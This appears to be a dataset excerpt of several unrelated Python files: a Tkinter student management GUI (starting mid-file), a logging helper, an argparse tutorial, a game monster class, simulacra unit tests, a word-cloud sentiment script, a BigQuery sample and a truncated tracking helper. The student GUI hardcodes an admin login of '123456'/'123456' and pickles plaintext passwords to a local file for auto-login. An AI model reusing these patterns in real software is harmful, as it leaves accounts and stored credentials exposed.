'RoyalBlue')\n r1c1_up.grid(row = 0,column = 0,sticky = W)\n r1c1_dumn = Frame(r1c1,bg = 'RoyalBlue')\n r1c1_dumn.grid(row = 1,column = 0)\n\n #r1c1_up\n seachentry = Entry(r1c1_up)\n seachentry.grid(row = 0,column = 0,padx = 44)\n choose = ttk.Combobox(r1c1_up)\n choose.grid(row = 0,column = 1,sticky = W,padx = 0)\n choose['value'] = ('学号','姓名','专业')\n choose.current(0)\n Button(r1c1_up,text = '搜索',command = lambda:seach(choose.current(),seachentry.get())).grid(row = 0,column = 2,sticky = W,padx = 40,pady = 7)\n Button(r1c1_up,text = '撤销搜索',command = add_all).grid(row = 0,column = 3,sticky = W,padx = 0,pady = 7)\n\n #r1c1_dumn\n b2.config(bg = 'RoyalBlue')\n list2 = ttk.Treeview(r1c1_dumn,show = 'headings',column = ['学号','姓名','专业','大学语文','高等数学','大学英语','大学物理'],height = 21)\n list2.column('学号',width = 86,anchor = CENTER)\n list2.column('姓名',width = 86,anchor = CENTER)\n list2.column('专业',width = 120,anchor = CENTER)\n list2.column('大学语文',width = 86,anchor = CENTER)\n list2.column('高等数学',width = 86,anchor = CENTER)\n list2.column('大学英语',width = 86,anchor = CENTER)\n list2.column('大学物理',width = 86,anchor = CENTER)\n list2.heading('学号',text = '学号')\n list2.heading('姓名',text = '姓名')\n list2.heading('专业',text = '专业')\n list2.heading('大学语文',text = '大学语文')\n list2.heading('高等数学',text = '高等数学')\n list2.heading('大学英语',text = '大学英语')\n list2.heading('大学物理',text = '大学物理')\n for i in range(len(xueji)):\n list2.insert('',0,values = (xueji[i].id(),xueji[i].name(),xueji[i].discipline(),xueji[i].chinesescore(),xueji[i].mathscore(),xueji[i].englishscore(),xueji[i].physicsscore()))\n list2.pack(padx = 44)\n\n menubar = Menu(list2,tearoff = 0)\n\n menubar1 = Menu(menubar,tearoff = 0)\n menubar1.add_command(label = '大学语文',command = chinesechange)\n menubar1.add_command(label = '高等数学',command = mathchange)\n menubar1.add_command(label = '大学英语',command = englishchange)\n menubar1.add_command(label = '大学物理',command = physicschange)\n\n menubar.add_cascade(label = '修改',menu = menubar1)\n list2.bind('',menu)\n\ndef changeto_b3():\n global r1c1\n r1c1.destroy()\n #row1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n colorreturn()\n b3.config(bg = 'RoyalBlue')\n\n namelabel = Label(r1c1,text = '姓名:',bg = 'RoyalBlue')\n namelabel.grid(padx = 20,pady = 20,row = 0,column = 0)\n\n name = Entry(r1c1)\n name.grid(row = 0,column = 1)\n\n genderlabel = Label(r1c1,text = '性别:',bg = 'RoyalBlue')\n genderlabel.grid(padx = 20,row = 0,column = 2)\n\n gender = ttk.Combobox(r1c1,width = 18)\n gender.grid(row = 0,column = 3,padx = 2)\n gender['value'] = ('男','女')\n\n\n idlabel = Label(r1c1,text = '学号:',bg = 'RoyalBlue')\n idlabel.grid(pady = 20,row = 1,column = 0)\n\n id = Entry(r1c1)\n id.grid(row = 1,column = 1)\n\n disciplinelabel = Label(r1c1,text = '专业:',bg = 'RoyalBlue')\n disciplinelabel.grid(row = 1,column = 2)\n\n discipline = ttk.Combobox(r1c1,width = 18)\n discipline.grid(row = 1,column = 3)\n discipline['value'] = ('计算机科学与技术','物理学','经济学','生物学')\n\n phonenumberlabel = Label(r1c1,text = '电话:',bg = 'RoyalBlue')\n phonenumberlabel.grid(pady = 20,row = 2,column = 0)\n\n phonenumber = Entry(r1c1)\n phonenumber.grid(row = 2,column = 1)\n\n homelabel = Label(r1c1,text = '生源地:',bg = 'RoyalBlue')\n homelabel.grid(row = 2,column = 2)\n\n home = ttk.Combobox(r1c1,width = 18)\n home.grid(row = 2,column = 3,padx = 2)\n home['value'] = ('北京市','天津市','上海市','重庆市','河北省','山西省','辽宁省','吉林省','黑龙江省','江苏省','浙江省','安徽省','福建省','江西省','山东省','河南省','湖北省','湖南省','广东省','海南省','四川省','贵州省','云南省','陕西省','甘肃省','青海省','台湾省','内蒙古自治区','广西壮族自治区','西藏自治区','宁夏回族自治区','新疆维吾尔自治区','香港特别行政区','澳门特别行政区')\n\n\n Button(r1c1,text = '清空',width = 20).grid(row = 3,column = 1,pady = 20)\n Button(r1c1,text = '录入',width = 20,command = lambda:add(name = name.get(),gender = gender.get(),id = id.get(),discipline = discipline.get(),phonenumber = phonenumber.get(),home = home.get())).grid(row = 3,column = 3,pady = 20) \n\ndef changeto_b4():\n def pwdchange():\n prompt1.set('')\n prompt2.set('')\n prompt3.set('')\n if oldpwd.get() == xueji[who].password():\n if newpwd1.get() == newpwd2.get():\n xueji[who].password_change(newpwd1.get())\n file_save()\n prompt1.set('修改成功')\n prompt2.set('修改成功')\n prompt3.set('修改成功')\n\n else:\n prompt2.set('这里必须相同!')\n prompt3.set('这里必须相同!')\n else:\n prompt1.set('原密码错误!')\n \n def loadout():\n win.destroy()\n f = open('学生管理系统/load','rb')\n tlist = pickle.load(f)\n f.close()\n f = open('学生管理系统/load','wb')\n tlist[1] = '0'\n pickle.dump(tlist,f)\n f.close()\n\n global r1c1\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1,sticky = N)\n r1c1.grid_propagate(0)\n r1c1.grid_propagate(0)\n colorreturn()\n b4.config(bg = 'RoyalBlue')\n\n Label(r1c1,text = '原密码:',bg = 'RoyalBlue').grid(row = 0,column = 0,padx = 40,pady = 30)\n oldpwd = Entry(r1c1)\n oldpwd.grid(row = 0,column = 1,padx = 40,pady = 30)\n prompt1 = StringVar()\n Label(r1c1,textvariable = prompt1,bg = 'RoyalBlue').grid(row = 0,column = 2)\n \n Label(r1c1,text = '新密码:',bg = 'RoyalBlue').grid(row = 1,column = 0,padx = 40,pady = 30)\n newpwd1 = Entry(r1c1)\n newpwd1.grid(row = 1,column = 1,padx = 40,pady = 30)\n prompt2 = StringVar()\n Label(r1c1,textvariable = prompt2,bg = 'RoyalBlue').grid(row = 1,column = 2)\n\n Label(r1c1,text = '确认密码:',bg = 'RoyalBlue').grid(row = 2,column = 0,padx = 40,pady = 30)\n newpwd2 = Entry(r1c1)\n newpwd2.grid(row = 2,column = 1,padx = 40,pady = 30)\n prompt3 = StringVar()\n Label(r1c1,textvariable = prompt3,bg = 'RoyalBlue').grid(row = 2,column = 2)\n\n\n tb = Button(r1c1,text = '修改密码',command = pwdchange)\n tb.grid(row = 3,column = 0,columnspan = 2,padx = 40,pady = 30)\n if identity == 'admin':\n tb.config(state = DISABLED)\n Button(r1c1,text = '退出登录',command = loadout).grid(row = 4,column = 0,columnspan = 2,padx = 40,pady = 10)\n\ndef loadcheck():\n global x\n global who\n global identity\n for i in range(len(xueji)):\n if username.get() == xueji[i].id() and password.get() == xueji[i].password():\n x = 1\n who = i\n identity = 'stu'\n if z.get() == '1':\n tlist = [z.get(),y.get(),username.get(),password.get()]\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n elif z.get() == '0':\n tlist = [z.get(),y.get(),'','']\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n load.destroy()\n break\n elif username.get() == '123456' and password.get() == '123456':\n x = 1\n if z.get() == '1':\n tlist = [z.get(),y.get(),username.get(),password.get()]\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n elif z.get() == '0':\n tlist = [z.get(),y.get(),'','']\n f = open('学生管理系统/load','wb')\n pickle.dump(tlist,f)\n f.close()\n load.destroy()\n break\n if x == 0:\n username.set('密码或用户名错误!')\n password.set('')\n\ndef zdgx():\n if y.get() == '1':\n z.set('1')\n\n#初始化\nstar()\nx = 0\nwho = 0\nf = open('学生管理系统/load','rb')\ndas = pickle.load(f)\nf.close()\nidentity = 'admin'\n\n#登录界面\nload = Tk(className = '登录')\npmx = load.winfo_screenwidth()\npmy = load.winfo_screenheight()\nweizhi = '%dx%d+%d+%d' % (430,300,(pmx-430)/2,(pmy-300)/2)\nload.geometry(weizhi)\nload.resizable(width = False,height = False)\nload.iconbitmap('学生管理系统/logo.ico')\n\nlogo = PhotoImage(file = '学生管理系统/logo.png')\nLabel(image = logo).pack(anchor = N)\n\nroot = Frame(load)\nroot.pack()\n\nusername = StringVar()\npassword = StringVar()\nusername.set(das[2])\npassword.set(das[3])\n\nblank2 = Label(root,text = '')\nblank2.grid(row = 1)\n\nun = Label(root,text = '用户名:',width = 8,anchor = W)\nun.grid(row = 2,column = 1)\nunentry = Entry(root,textvariable = username,width = 20)\nunentry.grid(row = 2,column = 2)\nunentry.focus_set()\n\nblank2 = Label(root,text = '')\nblank2.grid(row = 3)\n\npw = Label(root,text = '密码:',width = 8,anchor = W)\npw.grid(row = 4,column = 1)\npwentry = Entry(root,show = '*',textvariable = password,width = 20)\npwentry.grid(row = 4,column = 2)\n\nz = StringVar()\ny = StringVar()\nz.set(das[0])\ny.set(das[1])\nradio = Checkbutton(root,variable = z,onvalue = 1,offvalue = 0,text = '保存密码')\nradio.grid(row = 5,column = 1)\ncheck = Checkbutton(root,variable = y,onvalue = 1,offvalue = 0,text = '自动登录',command = zdgx)\ncheck.grid(row = 5,column = 2)\n\nButton(load,bg = 'blue',fg = 'white',text = '登录',width = 30,command = loadcheck).pack()\n\nif y.get() == '1':\n loadcheck()\n\nload.mainloop()\n\n##########################################################################################################################################\n\nif x == 1:\n win = Tk(className = '学生管理系统')\n # win.geometry('1000x618')\n weizhi = '%dx%d+%d+%d' % (1000,618,(pmx-1000)/2,(pmy-618)/2)\n win.geometry(weizhi)\n # win.resizable(width = False,height = False)\n win.iconbitmap('学生管理系统/logo.ico')\n\n #最上方位图logo\n logo = PhotoImage(file = '学生管理系统/logo.png')\n Label(bg = 'blue',image = logo,width = '746p').pack(anchor = W)\n\n #主体框架\n row0 = Frame(win,bg = 'blue')\n row0.pack(anchor = W)\n row1 = Frame(win,bg = 'RoyalBlue')\n row1.pack(anchor = W)\n\n #row0\n Label(row0,bg = 'blue',width = 25).grid(row = 0,column = 0)\n Label(row0,font = (10),text = '学生管理系统',bg = 'blue',fg = 'white',width = 64).grid(row = 0,column = 1)\n welcome = StringVar()\n if identity == 'admin':\n welcm = '欢迎 管理员'\n elif identity == 'stu':\n welcm = '欢迎 {} 同学!!'.format(xueji[who].name())\n welcome.set(welcm)\n Label(row0,textvariable = welcome,anchor = E,bg = 'blue',fg = 'white',width = 25).grid(row = 0,column = 2)\n\n #row1主体部分开始\n r1c0 = Frame(row1)\n r1c0.grid(row = 0,column = 0,sticky = N)\n r1c1 = Frame(row1,bg = 'RoyalBlue',width = 750,height = 494)\n r1c1.grid(row = 0,column = 1)\n\n #r1c0\n b1 = Button(r1c0,text = '学生基本资料',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b1)\n b1.grid(row = 0,column = 0)\n b2 = Button(r1c0,text = '学生成绩管理',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b2)\n b2.grid(row = 1,column = 0)\n b3 = Button(r1c0,text = '学生信息录入',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b3)\n if identity == 'admin':\n b3.grid(row = 2,column = 0)\n b4 = Button(r1c0,text = '账户设置',width = 30,height = 3,font = 15,relief = GROOVE,command = changeto_b4)\n b4.grid(row = 3,column = 0)\n\n win.mainloop()","sub_path":"学生管理系统/学生管理系统.pyw","file_name":"学生管理系统.pyw","file_ext":"pyw","file_size_in_byte":24751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"461589857","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''\n__Author__ = 'cherry'\n__Mtime__ = '2018/12/5 14:43'\n__Email__ = 'go.xmyang@gmail.com'\n'''\n\nimport logging\n\ndef runlog(logfile):\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n filename=logfile,\n filemode='a')\n logger = logging.getLogger(__name__)\n return logger\n","sub_path":"warch_run/lib/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"244768287","text":"# 1. Write a Python function that takes a sequence of numbers and determines whether all the\n# numbers are different from each other.\n\n\ndef test(list):\n for i in list:\n contor = 0\n for j in list:\n if i == j:\n if contor == 0:\n contor = contor + 1\n else:\n return False\n return True\n\n\nlist = [1, 2, 5, 5, 3]\nprint(test(list))\n","sub_path":"Python intro problems II/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238801192","text":"# ARGPARSE MODULE - argp07.py | Mutual Exclusion\r\n\r\n\r\n\"\"\"\r\n#-----------------------------------------------------------------------------------\r\n# ### INTRODUCTION TO ARGPARSE ###\r\n#-----------------------------------------------------------------------------------\r\n\r\nThe argparse module makes it easy to write user-friendly command-line interfaces. \r\nThe program defines what arguments it requires, and argparse will figure out how to \r\nparse those out of sys.argv. The argparse module also automatically generates help \r\nand usage messages and issues errors when users give the program invalid arguments.\r\n\r\nhttps://docs.python.org/3/library/argparse.html\r\n#-----------------------------------------------------------------------------------\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n\r\nThe add_argument() method\r\n\r\nArgumentParser.add_argument(name or flags...[, action][, nargs][, const][, default][, type][, choices][, required][, help][, metavar][, dest])\r\n\r\n\r\n1. name or flags - Either a name or a list of option strings, e.g. foo or -f, --foo.\r\n2. action - The basic type of action to be taken when this argument is encountered at the command line.\r\n3. nargs - The number of command-line arguments that should be consumed.\r\n4. const - A constant value required by some action and nargs selections.\r\n5. default - The value produced if the argument is absent from the command line.\r\n6. type - The type to which the command-line argument should be converted.\r\n7. choices - A container of the allowable values for the argument.\r\n8. required - Whether or not the command-line option may be omitted (optionals only).\r\n9. help - A brief description of what the argument does.\r\n10. metavar - A name for the argument in usage messages.\r\n11. dest - The name of the attribute to be added to the object returned by parse_args().\r\n\r\nhttps://docs.python.org/3/library/argparse.html#the-parse-args-method\r\n\"\"\"\r\n\r\nimport argparse\r\nimport sys\r\n\r\nprint('\\nPath of Python executable binary: {}'.format(sys.executable))\r\nprint('Python version: {}\\n '.format (sys.version))\r\n\r\n# 01 List of Command line arguments ------------------------------------------------ \r\nprint('Number of command-line arguments: {} '.format( len(sys.argv)) )\r\nprint('List of arguments: {} \\n\\n '.format( str(sys.argv)))\r\n#-----------------------------------------------------------------------------------\r\n\r\n\r\n\r\n\r\n# 07 ARGPARSE: Mutual Exclusion #---------------------------------------------------\r\n\r\nparser = argparse.ArgumentParser(description = 'Introduction to ARGPARSE Module')\r\n\r\ngroup1 = parser.add_mutually_exclusive_group(required = True)\r\n\r\n\r\n# Exclusive Group 1 arguments\r\ngroup1.add_argument('-c', '--cube', help = 'Cube', action = 'store_true')\r\ngroup1.add_argument('-s', '--sphere', help = 'Sphere', action = 'store_true')\r\n\r\n\r\n\r\n\r\n \r\n#\t> Positional arguments\r\nparser.add_argument('arg1', help = 'Length/radius of the cube/shpehre', type = float)\r\n\r\n\r\n\r\n# Optional Arguments\r\nparser.add_argument('-opt1', '--option1', help = 'Upper or Lower Case optional argument (str)',\r\n\t\t\t\t\ttype = str,\r\n\t\t\t\t\tnargs = '?',\r\n\t\t\t\t\tchoices = ['cap', 'low'],\r\n\t\t\t\t\tdefault = 'low')\r\n\t\t\t\t\t\r\nparser.add_argument('-p', '--printr', help = 'Print results',\r\n\t\t\t\t\taction = 'store_true')\r\n\r\n\r\nargs = parser.parse_args()\r\n\r\nif args.printr:\r\n\tif args.option1 == 'cap':\r\n\t\tif args.cube:\r\n\t\t\tprint('Length of the cube: {}'.format(args.arg1).upper())\r\n\t\telse:\r\n\t\t\tprint('Radius of the sphere: {}'.format(args.arg1).upper())\r\n\telse:\r\n\t\tif args.cube:\r\n\t\t\tprint('Length of the cube: {}'.format(args.arg1).lower())\r\n\t\telse:\r\n\t\t\tprint('Radius of the sphere: {}'.format(args.arg1).lower())\r\n\r\nelse:\t\r\n\tprint('Print option: {}'.format(args.printr))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"e.IO/argparse module/argp07.py","file_name":"argp07.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"95083832","text":"from playsound import playsound\nimport random\n\n\nclass Monster:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n self.health = 100\n\n def __str__(self):\n return (f\"\"\"{self.name} - {self.description}\nHealth: {self.health}\n\"\"\")\n\n def on_attack(self, player):\n is_hit = [\"strong\", \"weak\", \"miss\"]\n hit_is = is_hit[random.randint(0, 2)]\n if(not player.hasSword()):\n print(\"can't fight monsters without a sword\")\n return self.health\n if(hit_is == \"strong\"):\n playsound('sword_collide.mp3')\n playsound('slashkut.wav')\n self.health -= 30\n elif(hit_is == \"weak\"):\n playsound('sword_collide.mp3')\n playsound('slashkut.wav')\n self.health -= 20\n else:\n playsound('sword_swing.mp3')\n if(self.health <= 0):\n playsound('dying.wav')\n return self.health\n","sub_path":"src/monster.py","file_name":"monster.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"621663380","text":"# from tensorflow.python.ops.rnn_cell import BasicLSTMCell\n# import tensorflow as tf\nimport numpy as np\nimport math\nimport re\nimport matplotlib.pyplot as plt\nincorrect_path = 'F:\\\\HRNN.txt'\nfile_incorrect = open(incorrect_path, 'r')\nline = file_incorrect.readline()\naccuracy = list()\nepoch = list()\nloss = list()\n\nread_list=['Epoch - \\s?\\d+', 'MSE: s - \\d+.\\d+','f - \\d+.\\d+','v - \\d+.\\d+', 'q - \\d+.\\d+']\nnumber_regex_list=['\\d+','\\d+.\\d+','\\d+.\\d+','\\d+.\\d+','\\d+.\\d+']\nshow_list=[]\nindex_str='Epoch'\n\nstart_index = 3000\nrow_index=0\ndata=list()\nwhile line:\n col_index=0\n data_row = list()\n for read_str in read_list:\n regex_str = read_str\n regex = re.findall(regex_str, line)\n if len(regex)>0:\n data_str = re.findall(number_regex_list[col_index],regex[0])\n data_row.append(float(data_str[0]))\n\n col_index += 1\n data.append(data_row)\n line=file_incorrect.readline()\n row_index += 1\n\ndata=np.array(data)\n\n# Error Rate\n\nmin = np.min(data, 0)\n\n\npass\n","sub_path":"show_result.py","file_name":"show_result.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57912196","text":"import os\nimport unittest\nimport shutil\n\nimport simulacra as si\n\nTHIS_DIR = os.path.abspath(os.path.dirname(__file__))\nTEST_DIR = os.path.join(THIS_DIR, 'temp-unit-testing')\n\n\nclass TestBeet(unittest.TestCase):\n def setUp(self):\n self.obj = si.Beet('foo')\n self.obj_name = 'foo'\n self.target_name = 'foo.beet'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n def tearDown(self):\n shutil.rmtree(TEST_DIR)\n\n def test_beet_names(self):\n self.assertEqual(self.obj.name, self.obj_name)\n self.assertEqual(self.obj.file_name, self.obj_name)\n\n def test_save_load(self):\n path = self.obj.save(target_dir = TEST_DIR)\n self.assertEqual(path, os.path.join(TEST_DIR, self.target_name)) # test if path was constructed correctly\n self.assertTrue(os.path.exists(path)) # path should actually exist on the system\n loaded = si.Beet.load(path)\n self.assertEqual(loaded, self.obj) # beets should be equal, but NOT the same object\n self.assertEqual(loaded.uuid, self.obj.uuid) # beets should have the same uid\n self.assertEqual(hash(loaded), hash(self.obj)) # beets should have the same hash\n self.assertIsNot(loaded, self.obj) # beets should NOT be the same object\n\n\nclass TestSpecification(TestBeet):\n def setUp(self):\n self.obj = si.Specification('bar')\n self.obj_name = 'bar'\n self.target_name = 'bar.spec'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n\nclass TestSimulation(TestBeet):\n def setUp(self):\n self.obj = si.Simulation(si.Specification('baz'))\n self.obj_name = 'baz'\n self.target_name = 'baz.sim'\n si.utils.ensure_parents_exist(TEST_DIR)\n\n def testStatus(self):\n passes = (si.Status.INITIALIZED, si.Status.RUNNING, si.Status.RUNNING, si.Status.FINISHED, si.Status.PAUSED)\n fails = ('foo', 'foobar', 5, 10, None)\n\n for status in passes:\n with self.subTest(x = status):\n self.obj.status = status\n\n for status in fails:\n with self.subTest(x = status):\n with self.assertRaises(TypeError):\n self.obj.status = status\n\n\nclass TestSumming(unittest.TestCase):\n def setUp(self):\n self.summand_one = si.Summand()\n self.summand_two = si.Summand()\n self.sum = self.summand_one + self.summand_two\n\n def test_is(self):\n self.assertFalse(self.summand_one is self.summand_two)\n\n def test_equality(self):\n self.assertFalse(self.summand_one == self.summand_two)\n\n def test_instance_of(self):\n self.assertTrue(isinstance(self.summand_one, si.Summand))\n self.assertTrue(isinstance(self.summand_two, si.Summand))\n self.assertTrue(isinstance(self.sum, si.Summand))\n self.assertTrue(isinstance(self.sum, si.Sum))\n\n self.assertFalse(isinstance(self.summand_one, si.Sum))\n self.assertFalse(isinstance(self.summand_two, si.Sum))\n\n def test_container(self):\n self.assertTrue(self.summand_one in self.sum.summands)\n self.assertTrue(self.summand_two in self.sum.summands)\n\n self.assertTrue(self.summand_one in self.sum)\n self.assertTrue(self.summand_two in self.sum)\n\n\nclass TestSummingSubclassing(unittest.TestCase):\n def setUp(self):\n class Fruit(si.Summand):\n def __init__(self):\n super().__init__()\n self.summation_class = FruitBasket\n\n class FruitBasket(si.Sum, Fruit):\n container_name = 'basket'\n\n class Apple(Fruit):\n pass\n\n class Banana(Fruit):\n pass\n\n self.Fruit = Fruit\n self.FruitBasket = FruitBasket\n self.Apple = Apple\n self.Banana = Banana\n\n self.apple = self.Apple()\n self.banana = self.Banana()\n self.fruit_basket = self.apple + self.banana\n\n def test_instance_of_bases(self):\n self.assertTrue(isinstance(self.apple, si.Summand))\n self.assertTrue(isinstance(self.banana, si.Summand))\n self.assertTrue(isinstance(self.fruit_basket, si.Summand))\n self.assertTrue(isinstance(self.fruit_basket, si.Sum))\n\n self.assertFalse(isinstance(self.apple, si.Sum))\n self.assertFalse(isinstance(self.banana, si.Sum))\n\n def test_instance_of_subclasses(self):\n self.assertTrue(isinstance(self.fruit_basket, self.Fruit))\n self.assertTrue(isinstance(self.fruit_basket, self.FruitBasket))\n\n self.assertFalse(isinstance(self.fruit_basket, self.Apple))\n self.assertFalse(isinstance(self.fruit_basket, self.Banana))\n\n def test_container(self):\n self.assertTrue(self.apple in self.fruit_basket.basket)\n self.assertTrue(self.banana in self.fruit_basket.basket)\n\n self.assertTrue(self.apple in self.fruit_basket)\n self.assertTrue(self.banana in self.fruit_basket)\n","sub_path":"tests/old_tests.py","file_name":"old_tests.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365470906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 3 23:44:38 2019\r\n@author: Virendra Pratap Singh\r\nWritten Using Spyder (Python 3.7)\r\n\r\nWhat this code does?\r\n1) Read a phrase.\r\n2) Split into words.\r\n3) Remove stopwords.\r\n4) Calculate sentiments and divide words in POSITIVE & NEGATIVE words.\r\n5) Store them in list and ignore NEUTRAL words.\r\n6) Assign POSITIVE words to GREEN (POSITIVE) list and NEGATIVE words to RED (NEGATIVE) list.\r\n7) Draw wordcloud with colours decided on GREEN and RED list.\r\n\"\"\"\r\n\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\r\nfrom wordcloud import WordCloud, get_single_color_func\r\nimport matplotlib.pyplot as plt\r\n\r\ndef RemoveDuplicateFrom(list_of_words): \r\n \"\"\"\r\n Very simplistic duplicate removing function\r\n \"\"\"\r\n final_list = [] \r\n for word in list_of_words: \r\n if word not in final_list: \r\n final_list.append(word) \r\n return final_list \r\n\r\nclass AssignColour(object):\r\n \"\"\"\r\n Assigns colors to words based on a {color:[words]} dictionary \r\n using the already available wordcloud.get_single_color_func function.\r\n Note that [words] is a list - since I am dividing words in\r\n two possible categories - Positive and Negative\r\n \"\"\"\r\n def __init__(self, colour_words_dict, default):\r\n self.colour_words_dict = [\r\n (get_single_color_func(colour), set(words))\r\n for (colour, words) in colour_words_dict.items()]\r\n\r\n self.default = get_single_color_func(default)\r\n\r\n def get_colour(self, word):\r\n try:\r\n colour = next(\r\n colour for (colour, words) in self.colour_words_dict\r\n if word in words)\r\n except StopIteration:\r\n colour = self.default\r\n\r\n return colour\r\n\r\n def __call__(self, word, **kwargs):\r\n return self.get_colour(word)(word, **kwargs)\r\n\r\ntribute_dickens = \"\"\"\r\nIt was the best of times, \r\nit was the worst of times, \r\nit was the age of wisdom, \r\nit was the age of foolishness, \r\nit was the epoch of belief, \r\nit was the epoch of incredulity,\r\n it was the season of Light, \r\n it was the season of Darkness, \r\n it was the spring of hope, \r\n it was the winter of despair, \r\n we had everything before us, \r\n we had nothing before us, \r\n we were all going direct to Heaven, \r\n we were all going direct the other way.\r\n\"\"\"\r\n\r\ntribute_herge = \"\"\"\r\nTintin is sweet, smart and intelligent.\r\nHaddock is strong, loyal and drunk and friend of Tintin.\r\nCalculus is awesome genius, old and very deaf and friend of Haddock.\r\nThompson and Thomson are funny, stupid and nice and friends of Tintin.\r\nRastapopuolous is dangerous, enemy and evil and enemy of Tintin.\r\nCastafiore is sweet, arrogant and rich and friend of Haddock.\r\nDolivera is shrewd, clever and vendor and friend of Tintin.\r\nAbdullah is rascal, sweet and childish and not-friend of Tintin. \r\n\"\"\"\r\n\r\nphrase = tribute_dickens\r\n#phrase = tribute_herge\r\nstop_words=set(stopwords.words(\"english\"))\r\nclean_string = phrase.replace(',', '')\r\nwords = clean_string.split()\r\nwords = RemoveDuplicateFrom(words)\r\ncleaned_lines = dict()\r\npositive_words = []\r\nnegative_words = []\r\n\r\nsia = SentimentIntensityAnalyzer()\r\nfor r in words: \r\n if not r.lower() in stop_words: #Exclude words which are in StopWords list\r\n neg_polarity = sia.polarity_scores(r)['neg']\r\n pos_polarity = sia.polarity_scores(r)['pos']\r\n cpd_polarity = sia.polarity_scores(r)['compound']\r\n sentiment = (neg_polarity+pos_polarity)*cpd_polarity #I know this isn't a great formula\r\n if (sentiment != 0) : #Not listing any neutral words since they use the default colour\r\n cleaned_lines[r]=sentiment\r\n\r\nprint(cleaned_lines)\r\nprint(type(cleaned_lines))\r\n \r\nfor key,value in cleaned_lines.items(): #Divide between POSITIVE and NEGATIVE list\r\n if (value>0):\r\n positive_words.append(key)\r\n else:\r\n negative_words.append(key)\r\n\r\nprint(positive_words)\r\nprint(negative_words)\r\n\r\ncolour_words_dict = {\r\n # POSITIVE words are GREEN\r\n 'green': positive_words,\r\n # NEGATIVE words are RED\r\n 'red': negative_words\r\n}\r\n\r\nprint(colour_words_dict)\r\n\r\nwc = WordCloud(collocations=False, background_color='skyblue').generate(phrase.lower())\r\ngrouped_colour_func = AssignColour(colour_words_dict, 'white') #NEUTRAL words are WHITE\r\nwc.recolor(color_func=grouped_colour_func)\r\n\r\nplt.figure()\r\nplt.imshow(wc, interpolation=\"bilinear\")\r\nplt.axis(\"off\")\r\nplt.show()","sub_path":"word_painter.py","file_name":"word_painter.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"20319257","text":"from __future__ import print_function # For python 2/3 interoperability\n\n# [START sync_query]\n\nfrom samples import auth\nfrom samples import query\n\n\ndef sync_query(service, project_id, query, timeout=0):\n \"\"\" Run a synchronous query\"\"\"\n\n # [START query_data]\n query_data = {\n 'query': query,\n 'timeoutMs': timeout,\n }\n # [END query_data]\n\n return service.jobs().query(\n projectId=project_id,\n body=query_data).execute()\n\n\ndef main():\n service = auth.get_service()\n project_id = raw_input(\"Choose your project ID: \")\n query_string = raw_input(\"Enter your Bigquery SQL Query: \")\n\n for page in query.query_paging(service, query.query_polling(\n service, sync_query(service, project_id, query_string))):\n print(page)\n# [END sync_query]\n","sub_path":"samples/sync_query.py","file_name":"sync_query.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176321003","text":"import os\n\n\ndef init_tracker(tracker, img, boxes):\n for box in boxes:\n ok = tracker.add(img, box)\n if not ok:\n return False\n return True\n\n\ndef detection(filename):\n \"\"\"\n :param filename: the root of detection file, format txt\n :return: [(x, y, w, h), (x, y, w, h), ... , ()]\n \"\"\"\n if os.path.exists(filename):\n bboxs = []\n ids = []\n max_obj = 10\n with open(filename, 'r') as fr:\n infos = fr.readlines()\n count = 0\n for info in infos:\n count += 1\n if count > max_obj:\n break\n info = info.strip().split(\" \")\n label = info[0]\n x = int(info[2])\n y = int(info[3])\n h = int(info[-1]) - int(info[3])\n w = int(info[-2]) - int(info[2])\n if label in ['car', 'person'] and h > 100 and w > 50:\n bboxs.append((x, y, w, h))\n ids.append(count)\n if len(bboxs) == 0:\n return None, None\n else:\n return bboxs, ids\n else:\n print(\"{} is not exit!\".format(filename))\n return None, None\n\n\ndef compare(boxes, pre_boxes, pre_ids, max_id, th=0.5):\n new_boxes = []\n is_new = False\n if boxes is None:\n ids = None\n else:\n if pre_boxes is None:\n is_new = True\n new_boxes 